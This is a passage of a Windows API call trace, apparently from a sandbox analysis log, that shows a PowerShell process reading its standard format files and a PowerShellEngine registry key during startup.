	[0473.423] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3a0 | out: lpFileInformation=0x24d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0473.424] SetErrorMode (uMode=0x1) returned 0x1
	[0473.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0473.424] SetErrorMode (uMode=0x1) returned 0x1
	[0473.424] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3a0 | out: lpFileInformation=0x24d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0473.424] SetErrorMode (uMode=0x1) returned 0x1
	[0473.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0473.424] SetErrorMode (uMode=0x1) returned 0x1
	[0473.424] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3a0 | out: lpFileInformation=0x24d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0473.424] SetErrorMode (uMode=0x1) returned 0x1
	[0473.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0473.424] SetErrorMode (uMode=0x1) returned 0x1
	[0473.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3a0 | out: lpFileInformation=0x24d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0473.425] SetErrorMode (uMode=0x1) returned 0x1
	[0473.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0473.425] SetErrorMode (uMode=0x1) returned 0x1
	[0473.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3a0 | out: lpFileInformation=0x24d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0473.425] SetErrorMode (uMode=0x1) returned 0x1
	[0473.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0473.425] SetErrorMode (uMode=0x1) returned 0x1
	[0473.425] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3a0 | out: lpFileInformation=0x24d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0473.425] SetErrorMode (uMode=0x1) returned 0x1
	[0473.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0473.426] SetErrorMode (uMode=0x1) returned 0x1
	[0473.426] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3a0 | out: lpFileInformation=0x24d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0473.426] SetErrorMode (uMode=0x1) returned 0x1
	[0473.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0473.426] SetErrorMode (uMode=0x1) returned 0x1
	[0473.426] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3a0 | out: lpFileInformation=0x24d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0473.426] SetErrorMode (uMode=0x1) returned 0x1
	[0473.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0473.426] SetErrorMode (uMode=0x1) returned 0x1
	[0473.426] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d3a0 | out: lpFileInformation=0x24d3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0473.426] SetErrorMode (uMode=0x1) returned 0x1
	[0473.428] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0473.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0473.428] CoTaskMemFree (pv=0x1b91f0b0) 
	[0474.452] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0474.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.452] CoTaskMemFree (pv=0x1b91f0b0) 
	[0474.452] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0474.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.452] CoTaskMemFree (pv=0x1b91f0b0) 
	[0474.453] CoTaskMemAlloc (cb=0x104) returned 0x1b91f0b0
	[0474.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0474.453] CoTaskMemFree (pv=0x1b91f0b0) 
	[0474.454] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0474.454] GetFileType (hFile=0x2ec) returned 0x1
	[0474.454] SetErrorMode (uMode=0x1) returned 0x1
	[0474.454] GetFileType (hFile=0x2ec) returned 0x1
	[0474.454] ReadFile (in: hFile=0x2ec, lpBuffer=0x34558a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34558a0*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0474.456] ReadFile (in: hFile=0x2ec, lpBuffer=0x34558a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34558a0*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0474.456] ReadFile (in: hFile=0x2ec, lpBuffer=0x34558a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34558a0*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0474.456] ReadFile (in: hFile=0x2ec, lpBuffer=0x34558a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34558a0*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0474.457] ReadFile (in: hFile=0x2ec, lpBuffer=0x34558a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34558a0*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0474.457] ReadFile (in: hFile=0x2ec, lpBuffer=0x34558a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34558a0*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0474.457] ReadFile (in: hFile=0x2ec, lpBuffer=0x34558a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34558a0*, lpNumberOfBytesRead=0x24d038*=0x9e2, lpOverlapped=0x0) returned 1
	[0474.458] ReadFile (in: hFile=0x2ec, lpBuffer=0x3454dea, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x3454dea*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0474.458] ReadFile (in: hFile=0x2ec, lpBuffer=0x34558a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34558a0*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0474.458] CloseHandle (hObject=0x2ec) returned 1
	[0474.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0474.458] SetErrorMode (uMode=0x1) returned 0x1
	[0474.458] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfe0 | out: lpFileInformation=0x24cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0474.458] SetErrorMode (uMode=0x1) returned 0x1
	[0474.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0474.459] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d0c8 | out: phkResult=0x24d0c8*=0x2ec) returned 0x0
	[0474.459] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d04c, lpData=0x0, lpcbData=0x24d048*=0x0 | out: lpType=0x24d04c*=0x1, lpData=0x0, lpcbData=0x24d048*=0x56) returned 0x0
	[0474.459] CoTaskMemAlloc (cb=0x5a) returned 0x1b921fe0
	[0474.459] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d01c, lpData=0x1b921fe0, lpcbData=0x24d018*=0x56 | out: lpType=0x24d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d018*=0x56) returned 0x0
	[0474.459] CoTaskMemFree (pv=0x1b921fe0) 
	[0474.459] RegCloseKey (hKey=0x2ec) returned 0x0
	[0474.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0474.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0474.470] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x21c53c72, Data2=0xf6fa, Data3=0x4362, Data4=([0]=0xa6, [1]=0xa5, [2]=0xc3, [3]=0xe2, [4]=0xd6, [5]=0x40, [6]=0x46, [7]=0x46))) returned 0x0
	[0474.486] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xd7639de9, Data2=0x56a9, Data3=0x45ba, Data4=([0]=0xba, [1]=0x46, [2]=0x30, [3]=0x34, [4]=0x2a, [5]=0x20, [6]=0x54, [7]=0xe6))) returned 0x0
	[0474.488] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0474.488] GetFileType (hFile=0x2ec) returned 0x1
	[0474.488] SetErrorMode (uMode=0x1) returned 0x1
	[0474.488] GetFileType (hFile=0x2ec) returned 0x1
	[0474.488] ReadFile (in: hFile=0x2ec, lpBuffer=0x3480408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x3480408*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0474.490] ReadFile (in: hFile=0x2ec, lpBuffer=0x3480408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x3480408*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0474.490] ReadFile (in: hFile=0x2ec, lpBuffer=0x3480408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x3480408*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0474.490] ReadFile (in: hFile=0x2ec, lpBuffer=0x3480408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x3480408*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0475.679] ReadFile (in: hFile=0x2ec, lpBuffer=0x3480408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x3480408*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0475.680] ReadFile (in: hFile=0x2ec, lpBuffer=0x3480408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x3480408*, lpNumberOfBytesRead=0x24d038*=0xfb2, lpOverlapped=0x0) returned 1
	[0475.680] ReadFile (in: hFile=0x2ec, lpBuffer=0x347fb22, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x347fb22*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0475.680] ReadFile (in: hFile=0x2ec, lpBuffer=0x3480408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x3480408*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0475.681] CloseHandle (hObject=0x2ec) returned 1
	[0475.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0475.681] SetErrorMode (uMode=0x1) returned 0x1
	[0475.682] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfe0 | out: lpFileInformation=0x24cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0475.682] SetErrorMode (uMode=0x1) returned 0x1
	[0475.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0475.682] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d0c8 | out: phkResult=0x24d0c8*=0x2ec) returned 0x0
	[0475.682] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d04c, lpData=0x0, lpcbData=0x24d048*=0x0 | out: lpType=0x24d04c*=0x1, lpData=0x0, lpcbData=0x24d048*=0x56) returned 0x0
	[0475.682] CoTaskMemAlloc (cb=0x5a) returned 0x1b921fe0
	[0475.682] RegQueryValueExW (in: hKey=0x2ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d01c, lpData=0x1b921fe0, lpcbData=0x24d018*=0x56 | out: lpType=0x24d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d018*=0x56) returned 0x0
	[0475.682] CoTaskMemFree (pv=0x1b921fe0) 
	[0475.682] RegCloseKey (hKey=0x2ec) returned 0x0
	[0475.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0475.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0475.684] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x64fd79c, Data2=0x9a5e, Data3=0x4ebf, Data4=([0]=0xa1, [1]=0xab, [2]=0x99, [3]=0x8b, [4]=0xa1, [5]=0x45, [6]=0xf9, [7]=0x4b))) returned 0x0
	[0475.700] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xd82225ec, Data2=0x89bf, Data3=0x40d1, Data4=([0]=0x87, [1]=0x48, [2]=0x44, [3]=0xd0, [4]=0x39, [5]=0x48, [6]=0xcd, [7]=0xab))) returned 0x0
	[0475.702] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xa03bff1e, Data2=0xcc27, Data3=0x489e, Data4=([0]=0xaa, [1]=0x82, [2]=0x94, [3]=0x49, [4]=0xca, [5]=0x96, [6]=0x4c, [7]=0x4b))) returned 0x0
	[0475.703] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x39e71876, Data2=0xecfe, Data3=0x4f60, Data4=([0]=0xa0, [1]=0xf4, [2]=0x5c, [3]=0xde, [4]=0xb1, [5]=0xea, [6]=0x21, [7]=0xad))) returned 0x0
	[0475.703] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xcc6e832b, Data2=0xae35, Data3=0x4667, Data4=([0]=0x8d, [1]=0x82, [2]=0xb6, [3]=0x15, [4]=0x47, [5]=0xa6, [6]=0x3b, [7]=0x9d))) returned 0x0
	[0475.704] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x24f26056, Data2=0xb74d, Data3=0x45fd, Data4=([0]=0xa6, [1]=0x1a, [2]=0x0, [3]=0xb7, [4]=0xd9, [5]=0x4b, [6]=0x7e, [7]=0x3a))) returned 0x0
	[0475.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0475.705] SetErrorMode (uMode=0x1) returned 0x1
	[0475.705] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2ec
	[0475.705] GetFileType (hFile=0x2ec) returned 0x1
	[0475.705] SetErrorMode (uMode=0x1) returned 0x1
	[0475.705] GetFileType (hFile=0x2ec) returned 0x1
	[0475.706] ReadFile (in: hFile=0x2ec, lpBuffer=0x34cc168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34cc168*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0475.707] ReadFile (in: hFile=0x2ec, lpBuffer=0x34cc168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34cc168*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0475.707] ReadFile (in: hFile=0x2ec, lpBuffer=0x34cc168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34cc168*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0475.707] ReadFile (in: hFile=0x2ec, lpBuffer=0x34cc168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34cc168*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0475.708] ReadFile (in: hFile=0x2ec, lpBuffer=0x34cc168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x34cc168*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
